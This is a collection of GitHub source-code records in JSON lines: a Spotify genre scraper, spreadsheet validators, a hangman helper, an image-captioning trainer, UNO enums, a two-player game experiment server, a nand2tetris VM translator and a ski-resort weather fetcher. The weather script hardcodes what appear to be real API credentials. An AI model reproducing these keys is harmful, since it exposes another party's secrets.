params=kwargs).text).get(\"genres\", [])\n )\n else:\n request_url = f\"https://api.spotify.com/v1/artists/{row}\"\n genres.extend(json.loads(make_request(request_url, params=kwargs).text).get(\"genres\", []))\n return list(set(genres))\n\n\ndef parallelize(data, func, num_of_processes=8):\n data_split = np.array_split(data, num_of_processes)\n pool = Pool(num_of_processes)\n data = pd.concat(pool.map(func, data_split))\n pool.close()\n pool.join()\n return data\n\n\ndef run_on_subset(func, data_subset):\n return data_subset.apply(func, axis=1)\n\n\ndef parallelize_on_rows(data, func, num_of_processes=8):\n return 
parallelize(data, partial(run_on_subset, func), num_of_processes)\n\n\nif __name__ == \"__main__\":\n    playlist_tracks_raw = get_palylist(\"4ZMt8eMC3Vd1G40g527Msa\")\n    playlist_tracks = list(map(select_elements, playlist_tracks_raw))\n\n    df = pd.DataFrame(playlist_tracks)\n    logger.info(f\"Collected {df.shape[0]} musics from this playlist\")\n\n    logger.info(\"Getting genres\")\n    df[\"genres\"] = parallelize_on_rows(df, get_genre_by_artist)\n    df.to_json(\"playlist.json\", orient=\"records\")\n","repo_name":"PauloCarneiro99/Spotify-Sommelier","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72776490649","text":"import pandas as pd\nfrom validate_email import validate_email\n\nvalid_emails = pd.DataFrame()\n\n\ndef row_id_validator(document):  # this function was made to validate the items in column A using the isinstance()\n    # function and then storing all the \"non-integers\" in a list\n    id_list = list(document['row_id'])\n    bad_cell_id = []\n\n    for i, row in enumerate(id_list):\n        if not isinstance(row, int):\n            bad_cell_id.append({\"row\": i, \"column\": \"row_id\", \"value\": row})\n\n    return bad_cell_id\n\n\ndef email_validator(document):  # this function is designed to validate the items in column G using the\n    # \"validate_email\" library and then store all non-email items in a list\n    email_list = list(document['email'])\n    bad_cell_email = []\n\n    for i, row in enumerate(email_list):\n        v = validate_email(f'{row}')\n        if not v:\n            bad_cell_email.append({\"row\": i, \"column\": \"email\", \"value\": row})\n\n    return bad_cell_email\n\n\ndef sales_validator(document):  # this function was made to validate the items in the \"sales\" column using the\n    # isinstance() function, but I didn't find an alternative to validate correctly\n    sales_list = list(document['sales'])\n    bad_cell_sales = []\n\n    for i, row in enumerate(sales_list):\n        if not isinstance(row, float):\n            bad_cell_sales.append({\"row\": i, \"column\": \"sales\", \"value\": row})\n\n    return bad_cell_sales\n","repo_name":"joaovitorsh/Academic-Works-and-Activities","sub_path":"Python/read excel/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"31033473505","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis program stores the various functions used by the main program\n@author: Hector Irrmann\nCreated on Fri Dec 11 08:26:42 2020\nTo Do: add the tkinter functions and get them working\n\"\"\"\nfrom tkinter import Tk, Entry, Button, Canvas, Label, StringVar, messagebox\nfrom random import randint\n\ndef freponse(): #Returns the word to guess\n    listeMots=[\"jour\",\"mois\",\"poste\",\"annee\",\"python\",\"abeille\",\"ordinateur\"]\n    a=randint(0,6)\n    mot=listeMots[a]\n    return mot\n\n\n\ndef fLettres(mot): #Returns a list with all the letters of the word separated\n    l1=[]\n    for i in mot:\n        l1.append(i)\n    return l1\n\n\ndef fMot (listeLettre): #Returns a string with all the letters of the word except the first\n    var=\"\"\n    for i in listeLettre[1:]:\n        var=var+i\n    return var\n\n\n\ndef fEssai(lettre,proposition,lettretrouve): #returns the letters that were found\n    if lettre not in proposition:\n        proposition=proposition+lettre\n        if lettre in Mot:\n            lettretrouve=lettretrouve+lettre\n            messagebox.showinfo('Bien joué!')\n            essai.set('')\n        else:\n
            messagebox.showinfo('Le mot mystère ne contient pas cette lettre')\n            essai.set('')\n    else:\n        messagebox.showinfo('Vous avez déjà essayé cette lettre, veuillez en essayer une autre')\n        essai.set('')\n    \n    \n    return lettretrouve\n    \n\n\ndef fAffiche(listeLettre): #returns the mystery word with '_' for the letters not yet found\n    reponse=listeLettre[0]\n    for i in Mot:\n        if i in lettretrouve:\n            reponse=reponse+i\n        else:\n            reponse=reponse+\" _\"\n    return reponse\n\n\ndef fChance(chance): #not much here for now\n    if chance==8:\n        return \n\n    \n\n\n","repo_name":"Hector-Irr/Python_pendu","sub_path":"ma_lib_tkinter.py","file_name":"ma_lib_tkinter.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39021398997","text":"import torch\nimport numpy as np\nfrom torchvision import transforms\nfrom dataset import *\nfrom model import encoder, decoder\nimport sys\ndef train():\n    # few things that we have to define\n    batch_size = 32\n    train = True\n    transform_train = transforms.Compose([\n        transforms.Resize(256),                          # smaller edge of image resized to 256\n        transforms.RandomCrop(224),                      # get 224x224 crop from random location\n        transforms.ToTensor(),                           # convert the PIL Image to a tensor\n        transforms.Normalize((0.485, 0.456, 0.406),      # normalize image for pre-trained model\n                             (0.229, 0.224, 0.225))])\n    iteration = 3\n    vocabulary_threshold = 5\n    embed_size = 512\n    hidden_size = 512\n    hidden_layer =1\n    model_save = \"model_storage/\"\n    # calling the dataloader\n    train_dataLoader = get_data_loader(vocabulary_threshold, train, batch_size, transform_train)\n    enc = encoder(embed_size, batch_size)\n    dec = decoder(len(train_dataLoader.dataset.vocab.word_to_index), embed_size, hidden_layer, hidden_size)\n    params = list(enc.dense.parameters()) + list(dec.parameters())\n    criteria = torch.nn.CrossEntropyLoss()\n    optimizer = torch.optim.Adam(params, lr=0.001, betas=(0.9, 0.999), eps=1e-08)\n    steps_per_epoch = int(np.math.ceil(len(train_dataLoader.dataset.caption_len)/batch_size))\n    for epoch in range(iteration):\n        for step in range(steps_per_epoch):\n            index = train_dataLoader.dataset.trainIndices(batch_size)\n            sampler = torch.utils.data.SubsetRandomSampler(index)\n            train_dataLoader.batch_sampler.sampler = sampler\n            img, caption = next(iter(train_dataLoader))\n            enc.zero_grad()\n            dec.zero_grad()\n            features = enc(img)\n            prediction = dec(features, caption)\n            loss = criteria(prediction.view(caption.size(0)*caption.size(1),-1), caption.view(-1))\n            loss.backward()\n            optimizer.step()\n            stats = \"[%d/%d] LOSS: %.4f, PERPLEXITY: %5.4f \"%(step, iteration, loss.item(), np.exp(loss.item()))\n            print(\"\\r \"+stats, end=\"\")\n            sys.stdout.flush()\n            if step%1000 ==0 and step != 0:\n                # here we save the weights\n                torch.save({\n                    \"model_state\":enc.state_dict()\n                },model_save+\"encoder_\"+str(step)+\".pth\")\n                torch.save({\n                    \"model_state\":dec.state_dict()\n                },model_save+\"decoder_\"+str(step)+\".pth\")\n        print(\"\\r\"+stats)\n\nif __name__ == \"__main__\":\n    train()\n","repo_name":"Anurich/Image-captioning","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8866606599","text":"from enum import Enum\n\n\nclass Colors(Enum):\n    blue = 0\n    red = 1\n    yellow = 2\n    green = 3\n    wild = 4\n\n\nclass Values(Enum):\n    zero = 0\n    one = 1\n    two = 2\n    three = 3\n    four = 4\n    five = 5\n    six = 6\n    seven = 
7\n eight = 8\n nine = 9\n ten = 10\n draw2 = 11\n skip = 12\n reverse = 13\n draw4 = 14\n chooseColor = 15\n","repo_name":"NWuensche/UNOinPython","sub_path":"EnumsCards.py","file_name":"EnumsCards.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40022307563","text":"from __future__ import print_function,division,absolute_import \nimport random\nfrom twisted.internet import reactor\nfrom twisted.internet import task\n\nclass experimentClass():\n def __init__(self):\n self.setParameters()\n self.data['matchType']=\"regular\"\n self.monitorTaskList=['loadInstructions','startQuiz','startExperiment']\n\n # - store data in self.data[subjectID] which is a Subject object (defined below)\n # - send messages like self.messageToId(msg,sid)\n # - list of all subjects at self.data['subjectIDs']\n\n def setParameters(self):\n print(\"!!!!!!SET PARAMETERS!!!!!!!!\")\n\n self.data['francsPerDollar']=20\n self.data['exchangeRate']=float(1)/self.data['francsPerDollar']#dollars per point. So 0.05 if 5 cents per point.\n \n self.data['rowColors']={1:\"rgba(228,26,28,1)\",2:\"rgba(55,126,184,1)\",3:\"rgba(77,175,74,1)\"}\n self.data['colColors']={1:\"rgba(152,78,163,1)\",2:\"rgba(255,127,0,1)\",3:\"rgba(200,200,51,1)\"}\n\n self.data['rowActions']={1:\"U\",2:\"D\"}\n self.data['colActions']={1:\"L\",2:\"R\"}\n\n self.data['numberOfRows']=len(self.data['rowActions'])\n self.data['numberOfCols']=len(self.data['colActions'])\n\n self.data['groupSize']=2\n\n self.data['totalMatches']=2\n self.data['supergameLengths']={0:86,1:122,2:80,3:67,4:142} \n self.data['supergameLengths']={0:2,1:2,2:3,3:3,4:3} \n\n self.data['rawPays']={}\n self.data['rawPays'][0]={1:{1:[20,0],2:[-1,-1]},2:{1:[-1,-1],2:[0,10]}}\n self.data['rawPays'][1]={1:{1:[20,0],2:[-1,-1]},2:{1:[-1,-1],2:[0,10]}}\n self.data['rawPays'][2]={1:{1:[20,0],2:[-1,-1]},2:{1:[-1,-1],2:[0,10]}}\n self.data['rawPays'][3]={1:{1:[20,0],2:[-1,-1]},2:{1:[-1,-1],2:[0,10]}}\n self.data['rawPays'][4]={1:{1:[20,0],2:[-1,-1]},2:{1:[-1,-1],2:[0,10]}}\n\n def notAcceptingClientsAnymore(self):\n totalSubjects=len(self.data['subjectIDs'])\n if totalSubjects%2!=0:\n print(\"NEED MULTIPLE OF 2, CAN'T STOP ACCEPTING\")\n self.data['serverStatus']['acceptingClients']=1\n self.monitorMessage()\n else:\n thisMatchSubjects=self.data['subjectIDs'][:]\n groups=[]\n for groupNumber in range(totalSubjects//2):\n groups.append(thisMatchSubjects[groupNumber*2:groupNumber*2+2])\n\n self.data['pays']={}\n self.data['order']={}\n self.data['matching']={}\n self.data['roles']={}\n\n for match in range(self.data['totalMatches']):\n random.shuffle(thisMatchSubjects)\n self.data['pays'][match]={}\n self.data['matching'][match]={}\n self.data['order'][match]={}\n self.data['roles'][match]={}\n for groupNumber in range(totalSubjects//2):\n player1=thisMatchSubjects[2*groupNumber+0]\n player2=thisMatchSubjects[2*groupNumber+1]\n thesePays=self.data['rawPays'][match]\n thesePays,thisOrder=self.rawPayoffsSwitchActions(thesePays,0)\n self.data['order'][match][player1]=thisOrder\n thesePays,thisOrder=self.rawPayoffsSwitchActions(thesePays,1)\n self.data['order'][match][player2]=thisOrder\n\n self.data['pays'][match][player1]=self.rawPayoffsToRolePayoffs(thesePays,0)\n self.data['pays'][match][player2]=self.rawPayoffsToRolePayoffs(thesePays,1)\n self.data['matching'][match][player1]=[player2]\n self.data['matching'][match][player2]=[player1]\n self.data['roles'][match][player1]=0\n 
self.data['roles'][match][player2]=1\n            print(\"matching set!!!!!!!\")\n\n\n\n    def rawPayoffsSwitchActions(self,pays,player):\n        #this function switches the names of actions for a given player\n        player1Actions=[x for x in pays]\n        player2Actions=[x for x in pays[player1Actions[0]]]\n        if player==0:\n            newPays={}\n            random.shuffle(player1Actions)\n            for o,n in zip(range(len(player1Actions)),player1Actions):\n                newPays[n]={}\n                for a2 in player2Actions:\n                    newPays[n][a2]=pays[o+1][a2]\n            actionsOut=player1Actions\n        elif player==1:\n            newPays={}\n            random.shuffle(player2Actions)\n            for a1 in player1Actions:\n                newPays[a1]={}\n                for o,n in zip(range(len(player2Actions)),player2Actions):\n                    newPays[a1][o+1]=pays[a1][n]\n            actionsOut=player2Actions\n        return newPays,actionsOut\n\n\n\n    def rawPayoffsToRolePayoffs(self,pays,role):\n        #this ensures that players have correct payoffs when they have separate roles\n        if role==0:\n            paysOut=pays\n        elif role==1:\n            newPays={}\n            for c1 in pays:\n                for c2 in pays[c1]:\n                    this=pays[c1][c2]\n                    if c2 not in newPays:\n                        newPays[c2]={}\n                    newPays[c2][c1]=[this[1],this[0]]\n            paysOut=newPays\n        return paysOut\n\n    \n    def reconnectingClient(self,client):\n        sid=client.subjectID\n        if self.data['serverStatus']['page']==\"experiment\":#experiment has started\n            self.sendParameters(sid)\n            self.data[sid].getStatus()\n            self.updateStatus(sid)\n\n\n\n    def displayFinalSummary(self,subjectID):\n        if 'paymentSummary' not in self.data[subjectID].status:\n            self.data[subjectID].status['paymentSummary']=\"Please wait for other subjects to finish.\"\n        if \"doneWithEverything\" in self.data[subjectID].status:\n            self.data[subjectID].status['page']=\"generic\"\n            self.data[subjectID].status['message']=\"subjectID: %s
\"%(subjectID)+self.data[subjectID].status['paymentSummary']\n self.updateStatus(subjectID)\n\n\n\n def startExperiment(self,message,client):\n self.experimentSpecificMonitorTableEntries()\n self.data['serverStatus']['page']=\"experiment\" \n self.taskDone(message)\n self.data['currentMatch']=-1\n self.startMatch()\n print(\"Starting Experiment!\")\n\n\n def startMatch(self):\n self.data['currentMatch']+=1\n for sid in self.data['subjectIDs']:\n self.data[sid].newMatch(self.data['currentMatch'])\n self.sendParameters(sid)\n self.data[sid].getStatus()\n self.updateStatus(sid)\n\n def checkIfGroupFinished(self,sid):\n #allMembers including myself\n allMembers=self.data['matching'][self.data['currentMatch']][sid]+[sid]\n complete=True\n if self.data['matching'][self.data['currentMatch']][sid]==[\"randomPlayer\"]:\n if self.data[sid].status[\"stage\"]==\"bothSelected\":\n complete=True\n else:\n complete=False\n else:\n for s in allMembers:\n if self.data[s].status[\"stage\"]!=\"bothSelected\":\n complete=False\n break\n return complete\n\n def confirmMatchOver(self,message,client):\n sid=client.subjectID\n self.data[sid].status['stage']=\"matchOverConfirmed\"\n self.data[sid].getStatus()\n print(self.data[sid].status)\n self.updateStatus(sid)\n self.checkIfMatchFinished()\n\n\n def calculateFinalPayoffs(self,subjectID):\n #must determine how final payoffs will be calculated here\n self.data[subjectID].finalPayoffs['game']=5#francs\n # self.data[subjectID].finalPayoffs['bonus']=5#dollars\n\n self.data[subjectID].finalPayoffs['total']=self.data[subjectID].finalPayoffs['showup']#dollars\n self.data[subjectID].finalPayoffs['total']+=self.data[subjectID].finalPayoffs['bonus']#dollars\n self.data[subjectID].finalPayoffs['total']+=self.data[subjectID].finalPayoffs['game']*self.data['exchangeRate']\n\n self.data[subjectID].status['payment']=\"%.02f\"%(self.data[subjectID].finalPayoffs['total'])\n\n #self.data[subjectID].status['page']=\"generic\"\n self.data[subjectID].status['page']=\"questionnaire\"\n\n self.data[subjectID].status['message']=\"subjectID: %s
\"%(subjectID)\n self.data[subjectID].status['message']=\"Show Up Fee: $5
\"\n self.data[subjectID].status['message']+=\"Bonus Payment: $%s
\"%(self.data[subjectID].finalPayoffs['bonus'])\n self.data[subjectID].status['message']+=\"Game Earnings: %s francs
\"%(self.data[subjectID].finalPayoffs['game'])\n self.data[subjectID].status['message']+=\"Total Payoff = $%.02f\"%(self.data[subjectID].finalPayoffs['total'])\n\n self.updateStatus(subjectID)\n self.finalPayoffsSpecificMonitorTableEntries()\n self.monitorMessage()\n\n def checkIfMatchFinished(self):\n complete=True\n for sid in self.data['subjectIDs']:\n if self.data[sid].status['stage']!=\"matchOverConfirmed\":\n complete=False\n break\n if complete:\n if self.data['currentMatch']+1 You may read over the instructions as we wait to begin.\"]}\n\n def newMatch(self,match):\n self.currentPeriod=0\n self.currentMatch=match\n self.choices[self.currentMatch]={}\n self.choicesFromRawPaysGame[self.currentMatch]={}\n self.guesses[self.currentMatch]={}\n self.history[self.currentMatch]=[]\n self.payoffHistory[self.currentMatch]=[]\n self.myMatchPayoffs[self.currentMatch]=0\n self.opponentMatchPayoffs[self.currentMatch]=0\n self.status={\"page\":\"game\",\"stage\":\"makingChoices\",\"rowSelected\":\"No\",\"colSelected\":\"No\"}\n\n def getStatus(self):\n self.status['period']=self.currentPeriod\n self.status['match']=self.currentMatch\n self.status['history']=self.history[self.currentMatch]\n self.status['correctGuesses']=self.correctGuesses\n self.status['myMatchPay']=self.myMatchPayoffs[self.currentMatch]\n self.status['theirMatchPay']=self.opponentMatchPayoffs[self.currentMatch]\n self.status['myTotalPay']=self.totalPayoffs\n\n","repo_name":"jnromero/normalForm","sub_path":"files/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":19249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35374022536","text":"#!python\r\nimport sys,os\r\nfrom typing import List,Dict\r\n\r\nVM_COMENT = '//'\r\nVM_TRUE = '-1'\r\nVM_FALSE = '0'\r\n\r\nclass N2THackVMTranslator(object):\r\n\r\n def __init__(self, target_file_path: str):\r\n \r\n # 入力ファイル名と出力ファイル名を保持する変数を初期化\r\n self.vm_files = []\r\n self.asm_file = None\r\n\r\n self.vm_codes = {} # ファイルごとに1行ごとのVMコードを格納する\r\n self.parsed_vm_codes = {} # ファイルごとにVMコードのパース結果を格納する\r\n self.asm_codes = []\r\n\r\n def run(self):\r\n self.prepare_file_paths(target_file_path) # 入力ファイル名と出力ファイル名を設定\r\n self.load_vm_codes() # 入力ファイルの内容をリストに取り込む\r\n self.vm_tranlate()\r\n\r\n def prepare_file_paths(self, file_path):\r\n print(\" file_path = \" + file_path)\r\n\r\n if '.vm' in file_path:\r\n # --------------------------\r\n # ファイル指定の場合\r\n # --------------------------\r\n # 入力ファイル名を self.vm_files に設定\r\n self.vm_files = [file_path]\r\n # 出力ファイル名を self.asm_file に設定(拡張子を '.vm' から '.asm' に置換する)\r\n self.asm_file = file_path.replace('.vm', '.asm')\r\n\r\n else:\r\n # --------------------------\r\n # ディレクトリ指定の場合\r\n # --------------------------\r\n # 最後の '/' を削除\r\n file_path = file_path.rstrip('/')\r\n\r\n # os.walk を使ってディレクトリパス、ディレクトリ名、ファイル名を取得\r\n dirpath, dirnames, filenames = next(os.walk(file_path), ([], [], []))\r\n\r\n # '.vm' を含むファイルのみ対象とする\r\n vm_files = [filename for filename in filenames if '.vm' in filename]\r\n\r\n # 入力ファイル名を self.vm_files に設定(複数ファイルを想定)\r\n self.vm_files = [f\"{file_path}/{vm_file}\" for vm_file in vm_files]\r\n\r\n # 出力ファイル名を self.asm_file に設定(ディレクトリ名.asm)\r\n path_elements = file_path.split('/')\r\n self.asm_file = f\"{file_path}/{path_elements[-1]}.asm\"\r\n\r\n def load_vm_codes(self):\r\n # 入力ファイルの内容をリストに取り込む\r\n for vm_files in self.vm_files :\r\n self.vm_codes[vm_files] = []\r\n with open(vm_files, 'r') as input_file:\r\n # 入力ファイルの内容を1行ずつ読む\r\n for line in 
input_file:\r\n # 読み込んだ行をリストに追加\r\n self.vm_codes[vm_files].append(line.strip())\r\n\r\n\r\n def vm_tranlate(self):\r\n \"\"\"\r\n VMコードの変換\r\n \"\"\"\r\n\r\n code_writer = CodeWriter(self.asm_file)\r\n\r\n for vm_filepath, lines in self.vm_codes.items():\r\n print(f' File: {vm_filepath}')\r\n # 1行ずつVMコードを変換\r\n vm_parser = VMParser()\r\n vm_parser.vm_parse(lines)\r\n #vm_parser.increment()\r\n\r\n code_writer.write_assembly(vm_filepath,vm_parser.parsed_vm_codes)\r\n\r\n code_writer.close()\r\n\r\nclass VMParser(object):\r\n\r\n count=0\r\n @classmethod\r\n def increment(cls):\r\n cls.count += 1\r\n\r\n def __init__(self):\r\n # コマンドとコマンドタイプの対応辞書\r\n self.commands_dict = {\r\n 'add' : 'C_ARITHMETIC',\r\n 'sub' : 'C_ARITHMETIC',\r\n 'neg' : 'C_ARITHMETIC',\r\n 'eq' : 'C_ARITHMETIC',\r\n 'gt' : 'C_ARITHMETIC',\r\n 'lt' : 'C_ARITHMETIC',\r\n 'and' : 'C_ARITHMETIC',\r\n 'or' : 'C_ARITHMETIC',\r\n 'not' : 'C_ARITHMETIC',\r\n 'push' : 'C_PUSH',\r\n 'pop' : 'C_POP',\r\n 'label' : 'C_LABEL',\r\n 'goto' : 'C_GOTO',\r\n 'if-goto' : 'C_IF',\r\n 'function' : 'C_FUNCTION',\r\n 'return' : 'C_RETURN',\r\n }\r\n \r\n def vm_parse(self,lines):\r\n self.parsed_vm_codes=[]\r\n for line in lines:\r\n line = line.split(VM_COMENT)[0].strip()\r\n if line :\r\n # ディクショナリにパース結果を設定\r\n command_tokens = line.split()\r\n command_type = self.commands_dict[command_tokens[0]]\r\n\r\n # arg1 の設定\r\n if command_type == 'C_ARITHMETIC':\r\n arg1=command_tokens[0]\r\n elif command_type == 'C_RETURN':\r\n arg1=None\r\n else:\r\n arg1=command_tokens[1]\r\n\r\n # arg2 の設定\r\n if command_type == 'C_PUSH' or command_type == 'C_POP' or command_type == 'C_FUNCTION' or command_type == 'C_CALL':\r\n arg2=command_tokens[2]\r\n else:\r\n arg2=None\r\n\r\n parsed_line = {'command_type':command_type, 'arg1':arg1, 'arg2':arg2, 'vm_code' :line}\r\n\r\n # リストにディクショナリを追加\r\n self.parsed_vm_codes.append(parsed_line)\r\n\r\nclass CodeWriter(object):\r\n def __init__(self,asm_file):\r\n \"\"\"\r\n 生成した機械語のファイル出力\r\n \"\"\"\r\n print(f' OutFile: {asm_file}')\r\n self.output_file = open(asm_file, 'w')\r\n\r\n # メモリセグメントと実メモリのマッピング\r\n self.segment_dict = {\r\n 'local' : 'LCL',\r\n 'argument' : 'ARG',\r\n 'this' : 'THIS',\r\n 'that' : 'THAT',\r\n 'pointer' : '3',\r\n 'temp' : '5',\r\n 'static' : 'R16',\r\n 'constant' : 'undefined' # 実メモリへの割り当てなし\r\n }\r\n\r\n # ラベルのカウント:条件分岐毎にインクリメントし固有のラベルを作成する\r\n self.label_count = 1\r\n\r\n def write_assembly(self, vm_filepath,parsed_vm_codes):\r\n # VMファイル名を設定\r\n self.vm_filename=vm_filepath.split('/')[-1].split('.')[0]\r\n # コマンドタイプに応じてアセンブリコードを出力\r\n for command in parsed_vm_codes:\r\n vm_code = str(command['vm_code'])\r\n command_type = str(command['command_type'])\r\n arg1 = str(command['arg1'])\r\n arg2 = str(command['arg2'])\r\n\r\n self.output_line(f\"{VM_COMENT} {vm_code}\") # アセンブリの元となったVMコードを出力\r\n\r\n if command_type == \"C_ARITHMETIC\" :\r\n self.write_arithmetic(arg1)\r\n\r\n elif command_type in (\"C_PUSH\",\"C_POP\"):\r\n self.write_push_pop(command_type,arg1,arg2)\r\n else:\r\n pass\r\n \r\n def write_arithmetic(self,command):\r\n\r\n self.pop_stack_to_D()\r\n\r\n # unary operator\r\n if command == \"neg\":\r\n self.output_line(\"M=-D\") \r\n\r\n elif command == \"not\":\r\n self.output_line(\"M=!D\") \r\n\r\n # binary operator\r\n elif command in (\"add\",\"sub\",\"and\",\"or\"):\r\n self.sp_decrement()\r\n self.output_line(\"A=M\")\r\n if command == \"add\":\r\n self.output_line(\"M=D+M\") \r\n elif command == \"sub\":\r\n self.output_line(\"M=M-D\")\r\n elif command == \"and\":\r\n 
self.output_line(\"M=D&M\")\r\n elif command == \"or\":\r\n self.output_line(\"M=D|M\")\r\n\r\n # Comparison operator\r\n elif command in (\"eq\",\"gt\",\"lt\"):\r\n self.sp_decrement()\r\n self.output_line(\"A=M\")\r\n self.output_line(\"D=M-D\")\r\n\r\n label_true = f\"LABEL{str(self.label_count).zfill(5)}_TRUE\"\r\n label_end = f\"LABEL{str(self.label_count).zfill(5)}_END\"\r\n\r\n self.output_line(\"@\" + label_true)\r\n if command == \"eq\":\r\n self.output_line(\"D;JEQ\")\r\n elif command == \"gt\":\r\n self.output_line(\"D;JGT\")\r\n elif command == \"lt\":\r\n self.output_line(\"D;JLT\")\r\n\r\n # if false\r\n self.set_A_to_stack()\r\n self.output_line(f\"M={VM_FALSE}\") # set false valueW\r\n self.output_line(f\"@{label_end}\")\r\n self.output_line(\"0;JMP\")\r\n \r\n # if true\r\n self.output_line(f\"({label_true})\")\r\n self.set_A_to_stack()\r\n self.output_line(f\"M={VM_TRUE}\") #set true value (-1 = 0xffff)\r\n self.output_line(f\"({label_end})\")\r\n self.label_count += 1\r\n\r\n self.sp_increment()\r\n\r\n def write_push_pop(self,command_type,segment,index):\r\n '''\r\n command_type: C_PUSH or C_POP\r\n segment: メモリセグメント\r\n index : インデックス\r\n '''\r\n\r\n # (1) セグメントに対応したメモリアドレスを取得する\r\n segment_address = self.segment_dict[segment]\r\n\r\n # (2) セグメントとインデックスからPUSH/POP位置を計算する\r\n if(segment == \"constant\"):\r\n self.output_line(f\"@{index}\")\r\n else:\r\n if(segment in (\"local\",\"argument\",\"this\",\"that\")):\r\n self.output_line(f\"@{segment_address}\")\r\n self.output_line(\"D=M\")\r\n self.output_line(f\"@{index}\")\r\n self.output_line(\"A=D+A\")\r\n\r\n elif(segment in (\"pointer\",\"temp\")):\r\n self.output_line(f\"@R{str(int(segment_address) + int(index))}\")\r\n\r\n elif(segment == \"static\"):\r\n self.output_line(f\"@{self.vm_filename}.{index}\")\r\n \r\n # (3) PUSH/POPを実行する\r\n if(command_type == \"C_PUSH\"):\r\n if(segment == \"constant\"):\r\n self.output_line(\"D=A\") # 定数(constant)の場合はAレジスタに値をセット\r\n else:\r\n self.output_line(\"D=M\") # 定数以外はメモリから値を取得 (メモリアドレスは(2)で計算済み)\r\n self.push_D_to_stack()\r\n\r\n elif(command_type == \"C_POP\"):\r\n self.output_line(\"D=A\")\r\n self.output_line(\"@R13\")\r\n self.output_line(\"M=D\") # R13にPOP先のアドレスを保存\r\n self.pop_stack_to_D()\r\n self.output_line(\"@R13\")\r\n self.output_line(\"A=M\")\r\n self.output_line(\"M=D\")\r\n\r\n def push_D_to_stack(self):\r\n self.set_A_to_stack()\r\n self.output_line(\"M=D\") # Write data to top of stack\r\n self.sp_increment() # Increment SP\r\n\r\n def pop_stack_to_D(self):\r\n self.sp_decrement()\r\n self.output_line(\"A=M\")\r\n self.output_line(\"D=M\")\r\n\r\n def set_A_to_stack(self):\r\n self.output_line(\"@SP\") # Get current stack pointer\r\n self.output_line(\"A=M\") # Set address to current stack pointer\r\n\r\n def sp_increment(self):\r\n self.output_line(\"@SP\")\r\n self.output_line(\"M=M+1\")\r\n\r\n def sp_decrement(self):\r\n self.output_line(\"@SP\")\r\n self.output_line(\"M=M-1\")\r\n\r\n def output_line(self,mnemonic):\r\n print(mnemonic,file=self.output_file)\r\n\r\n def close(self):\r\n self.output_file.close()\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) != 2:\r\n print(\"Usage: python3 n2t_hack_vm_translator.py or \")\r\n sys.exit(1)\r\n\r\n print(\"VM Translate Start\")\r\n target_file_path = sys.argv[1]\r\n\r\n vm_translator = N2THackVMTranslator(target_file_path)\r\n vm_translator.run()\r\n\r\n print(\"VM Translate 
End\")\r\n\r\n","repo_name":"i-net-singularity/nand2tetris_projects","sub_path":"07/n2t_hack_vm_translator.py","file_name":"n2t_hack_vm_translator.py","file_ext":"py","file_size_in_byte":11909,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22860640182","text":"import requests\nfrom datetime import date, timedelta\n\n\n'''\n***************************\n GET WEATHER DATA\n***************************\n'''\n\nAPP_ID = \"39eba088\"\nAPP_KEY = \"fe507959f9cfd3f54af726fc36e63d9a\"\n\n\n# takes in a Resorts list and set their matching ids\ndef set_resort_id(Resorts):\n resort_ids = [\"209004\", \"303020\", \"414002\", \"518005\", \"916004\"]\n for i in range(len(Resorts)):\n Resorts[i].set_id(resort_ids[i])\n\n\n# get JSON object\ndef request(r_id, app_id, app_key):\n return requests.get(\"https://api.weatherunlocked.com/api/resortforecast/\"\n \"{0}?app_id={1}&app_key={2}\"\n .format(r_id, app_id, app_key))\n\n\n# take in a Resorts list and get raw weather data of each Resort\ndef get_raw_weather(Resorts):\n raw_data = []\n for resort in Resorts:\n raw_data.append(request(resort.resort_id, APP_ID, APP_KEY).json())\n return raw_data\n\n\n# return the list of incoming 7 days' dates based on current dates\ndef get_forecast_week():\n today = date.today()\n seven_days = []\n for i in range(1, 8):\n next_day = today + timedelta(days=i)\n seven_days.append(next_day.strftime(\"%d/%m/%Y\"))\n return seven_days\n\n\n'''\n :Resorts: the list of Resorts objects\n'''\n# set core weather data into Resorts objects\ndef set_weather(Resorts):\n set_resort_id(Resorts)\n raw_data = get_raw_weather(Resorts)\n seven_days = get_forecast_week()\n set_weather_helper2(Resorts, raw_data, seven_days)\n\n\n'''\n :Resorts: the list of Resorts objects\n :raw_data: the list of full weather data without processed\n :seven_days: the list of the forecasting week from now\n'''\n# extract the core weather data from raw data on a future week, and populate them into all resort objects\ndef set_weather_helper2(Resorts, raw_data, seven_days):\n for d in range(len(seven_days)):\n for r in range(len(Resorts)):\n set_weather_helper1(seven_days[d], raw_data[r], Resorts[r], d)\n\n\n'''\n :forecast_date: the date of which weather to be forecasted\n :raw_data: the full weather data of each Resort without processed\n :resort: the particular resort which weather to be forecasted\n :kth_day: the Kth day need to be forecasted from now\n'''\n# abstract real-time core weather data on a single day and update in a single Resort object\ndef set_weather_helper1(forecast_date, each_raw_data, each_resort, kth_day):\n for day in each_raw_data[\"forecast\"]:\n if forecast_date in day.values():\n # choose date between 10am - 12am\n if \"10:00\" in day.values() \\\n or \"11:00\" in day.values() \\\n or \"12:00\" in day.values():\n # update core weather info on Kth day\n each_resort.weather[kth_day].set_weather(\n day[\"date\"],\n day[\"base\"][\"wx_desc\"],\n day[\"snow_in\"],\n day[\"rain_in\"],\n day[\"vis_mi\"],\n day[\"slp_in\"],\n day[\"base\"][\"temp_f\"],\n day[\"base\"][\"windspd_mph\"]\n 